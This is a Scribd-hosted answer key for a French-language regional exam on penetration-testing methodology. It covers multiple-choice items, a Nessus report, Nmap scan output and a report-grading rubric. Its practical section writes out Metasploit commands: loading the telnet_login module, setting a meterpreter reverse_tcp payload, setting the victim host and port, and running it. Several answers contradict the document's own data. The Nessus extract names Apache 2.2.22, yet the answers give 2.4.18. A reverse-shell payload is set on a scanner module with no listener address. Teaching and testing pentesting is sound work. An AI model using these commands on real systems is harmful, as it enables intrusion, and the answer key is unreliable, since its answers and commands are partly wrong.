0% ont trouvé ce document utile (0 vote)
78 vues5 pages

IDOCS M202 Corrigé

Le document est un examen régional de fin de module sur les méthodologies des tests d'intrusion, comprenant des questions théoriques et pratiques. Il évalue les connaissances des étudiants sur des sujets tels que les tests d'intrusion, les vulnérabilités et l'utilisation d'outils comme Nmap et Metasploit. Les éléments de correction sont fournis pour guider l'évaluation des réponses des étudiants.

Transféré par

atoumi068
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats DOCX, PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
78 vues5 pages

IDOCS M202 Corrigé

Le document est un examen régional de fin de module sur les méthodologies des tests d'intrusion, comprenant des questions théoriques et pratiques. Il évalue les connaissances des étudiants sur des sujets tels que les tests d'intrusion, les vulnérabilités et l'utilisation d'outils comme Nmap et Metasploit. Les éléments de correction sont fournis pour guider l'évaluation des réponses des étudiants.

Transféré par

atoumi068
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats DOCX, PDF, TXT ou lisez en ligne sur Scribd

Nom : ……………………………………….........................

Prénom : ………………………………………………………….
Direction Régionale RABAT-SALÉ-KENITRA
Groupe : ………………………………………………………….

Etablissement : ……………………………………………….
Examen régional de fin de module
Réservé à l’établissement Code :
Année de Formation 2023/2024 ……………………………………………………………………….
Eléments de correction

Code module : M 202


Intitulé du module : Méthodologies des tests d’intrusions

Filière : IDOCS Durée : 2h30mn


Année : 2°A Note finale : / 40
Nom&Prénom du correcteur Émargement

Théorie: (14 points)

(1Point/question) / 7 Points
QCM:
1. Le test d'intrusion est-il du hacking?

Oui, exclusivement.

Non, jamais.

Oui, mais dans un contexte légal.


2. Quelle approche de test d'intrusion est utilisée si le pentesteur connaît l'adresse IP et l'architecture de
la cible?

Black-box.

White-box.

Gray-box.
3. Que devez-vous vérifier dans le langage juridique avant de signer un accord de confidentialité et un NDA
pour des tests d'intrusion?

Les clauses relatives à la responsabilité en cas de divulgation non autorisée.

Les limitations de responsabilité du prestataire.

Les conditions de restitution ou de destruction des données obtenues.

Toutes les réponses ci-dessus.


4. Quels sont les canaux utilisés dans la méthodologie OSSTMM?

Canal thermique.

Canal magnétique.

Canal électromagnétique.

Réservé à l’établissement Code : …………………………………………………………. Page 1 / 5

Surveillant1 :……………………………………………………………….

Surveillant2 :………………………………………………………………. Num Module : M202


Canal de données.
5. Quelle méthodologie est associée à des tests tels que l'injection HTML, la redirection d'URL côté client
et l'injection CSS?

OWASP.

PTES.

OSSTMM.
6. Quel terme désigne l'utilisation d'outils comme Google searches et Maltego pour collecter des
informations sur la cible?

Scanning.

Enumeration.

Footprinting.
7. Qu'est-ce que le standard CVSS?

Common Vulnerability Scoring System.

Centralized Vulnerability Security Standard.

Cybersecurity Vulnerability Support System.

Aucune des réponses ci-dessus.

Exercice1 : / 7 Points
1. Qu'est-ce que l'acronyme "CVE" signifie dans l'identifiant CVE? (1 pt)
L'acronyme "CVE" signifie "Common Vulnerabilities and Exposures" en anglais, ce qui se traduit par
"Vulnérabilités et Expositions Courantes" en français.
2. Dans l'identifiant CVE "CVE-2023-56789", que représente le "2023"? (1 pt)

Le "2023" représente l'année où la vulnérabilité a été identifiée ou enregistrée dans le système CVE (Common
Vulnerabilities and Exposures).
3. Nessus est un outil de scanner de vulnérabilité utilisé pour identifier les faiblesses de sécurité dans les
systèmes informatiques. Voici un exemple d'extrait de rapport

Host: 192.168.1.1
Scan Name: Vulnerability_Scan_2023
Severity: High
Plugin ID: 12345
Plugin Name: Outdated Software Detected
Description: The remote host is running an outdated version of Apache Web Server (version 2.2.22).
This version is known to have multiple vulnerabilities that could be exploited by an attacker to gain
unauthorized access.
Solution: Upgrade to the latest version of Apache Web Server (version 2.4.46 or later).

Réservé à l’établissement Code : …………………………………………………………. Page 2 / 5

Surveillant1 :……………………………………………………………….

Surveillant2 :………………………………………………………………. Num Module : M202


a. Quelle est la vulnérabilité détectée dans cet extrait ? (1 pt)
La vulnérabilité détectée dans cet extrait est liée à Apache HTTP Server, version 2.4.18, et est probablement associée
à une version obsolète d'Apache.
b. Quelle est la version d'Apache signalée comme obsolète ? (1 pt)
La version obsolète d'Apache signalée est la version 2.4.18.
c. Pourquoi est-il important de remédier à cette vulnérabilité ? (1 pt)
Il est important de remédier à cette vulnérabilité car les versions obsolètes d'Apache peuvent contenir des
failles de sécurité connues qui pourraient être exploitées par des attaquants.
d. Pourquoi est-il crucial de mettre à jour vers la dernière version d'Apache ? (1 pt)

Mettre à jour vers la dernière version d'Apache est crucial car les nouvelles versions incluent généralement des correctifs
de sécurité qui adressent les vulnérabilités connues, renforçant ainsi la sécurité du serveur.
……………………………………………………………………………………………………………………………………………………………………………………

e. Comment la gravité d'une vulnérabilité peut-elle influencer la décision de prioriser les correctifs ? (1 pt)

La gravité d'une vulnérabilité peut influencer la décision de prioriser les correctifs en déterminant le niveau de risque
associé à l'exploitation de la vulnérabilité. Les vulnérabilités critiques, par exemple, nécessiteront probablement une
action immédiate pour réduire le risque global de sécurité.
Pratique : ( 26 points )

Exercice1 : /16 points


Considérons le résultat du scan Nmap suivant pour une cible donnée (adresse IP : 192.168.1.1). Utilisez ces informations pour
répondre aux questions suivantes :

Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-01 12:00 UTC


Nmap scan report for 192.168.1.1
Host is up (0.001s latency).s
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_- drwxr-xr-x 2 0 0 4096 Dec 31 23:59 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.2
| Logged in as anonymous
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h08m07s, median: 0s
|_nbstat: NetBIOS name: MYSERVER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: myserver
| NetBIOS computer name: MYSERVER\x00
| Domain name: \x00
| FQDN: myserver
|_ System time: 2023-01-01T12:00:00+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported

Réservé à l’établissement Code : …………………………………………………………. Page 3 / 5

Surveillant1 :……………………………………………………………….

Surveillant2 :………………………………………………………………. Num Module : M202


1. Donner la commande qui permettra d’afficher le résultat ci-dessus. (3 pts)

nmap -p 1-1024 -sV -A -T4 -Pn 192.168.1.1


toutes les options de nmap sont acceptées.

-Nous allons utiliser Metasploit Framework :


2. Donner la commande qui permet de Lancer l'interface console. (1 pt)

msfconsole

3.
Lancer la commande qui permettra de chercher la vulnérabilité Telnet login. (1 pt)

search telnet_login

4. Lancer la commande pour chercher les informations sur les options disponibles pour l’exploit
"auxiliary/scanner/telnet/telnet_login" ? (1 pt)

info auxiliary/scanner/telnet/telnet_login

5. Charger le module d'exploit. (1 pt)

use auxiliary/scanner/telnet/telnet_login

6. Lister les payload correspondant à cet exploit. (2 pts)

show payloads
7. Définir le payload :linux/x86/meterpreter/reverse_tcp. (2 pts)
set payload linux/x86/meterpreter/reverse_tcp
8. Vérifier les options. (2 pts)

show options

9. Configurez les options nécessaires pour le payload, telles que l'adresse IP de la victime (192.168.1.1) et le
port sur lequel vous souhaitez recevoir la connexion (6666). (2 pts)
set RHOST 192.168.1.1
set LPORT 6666
10. Lancer l’exploit. (1 pt)

run

Exercice2 :( 10 pts)

Les points à vérifier dans le rapport sont :

✓ Une introduction sur le test d’intrusion réalisé avec les informations sur la période des tests, le type du test d’intrusion, la
méthodologie suivie
✓ Un rappel du standard utilisé pour la classification des vulnérabilités
✓ Le cadre du test d’intrusion réalisé et l’environnement testé (les sous-réseaux, les applications, les produits, les services,
production/recette, etc.)
✓ Le résumé ne couvre pas les détails techniques ou la terminologie, mais l'aperçu des principaux résultats est expliqué en
termes simples
✓ Le résumé doit être court, clair et bien formaté

Réservé à l’établissement Code : …………………………………………………………. Page 4 / 5

Surveillant1 :……………………………………………………………….

Surveillant2 :………………………………………………………………. Num Module : M202


✓ Le résumé préciser l’impact métier potentiel en cas d’exploitation des vulnérabilités trouvées
• Les principales forces et faiblesses : cette section mettra la lumière sur les vulnérabilités ou les mauvaises configurations
fréquentes et aussi les pratiques et les systèmes en place qui améliorent la sécurité de l’entreprise
• Un tableau de bord des vulnérabilités trouvées, leurs criticités et les recommandations

Réservé à l’établissement Code : …………………………………………………………. Page 5 / 5

Surveillant1 :……………………………………………………………….

Surveillant2 :………………………………………………………………. Num Module : M202

Vous aimerez peut-être aussi